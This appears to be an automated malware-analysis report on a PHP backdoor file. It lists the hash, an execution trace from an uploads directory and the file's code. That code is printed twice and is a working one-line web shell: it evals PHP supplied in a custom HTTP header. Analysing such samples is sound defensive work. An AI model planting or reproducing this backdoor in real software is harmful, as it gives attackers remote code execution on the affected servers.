PHP Malware Analysis

backdoor.php

md5: 608ec59c90b0ff0bbd6a992e27f5d3a6

Jump to:

Screenshot


Attributes

Execution


Deobfuscated PHP code

<?php

@eval($_SERVER['HTTP_PHPSPL01T']);
?>

<!--backdoor-->

Execution traces

data/traces/608ec59c90b0ff0bbd6a992e27f5d3a6_trace-1676261625.0154.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:14:10.913301]
1	0	1	0.000320	393528
1	3	0	0.000372	394024	{main}	1		/var/www/html/uploads/backdoor.php	0	0
1	3	1	0.000400	394056
			0.000436	314272
TRACE END   [2023-02-13 02:14:10.913461]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>

<!--backdoor-->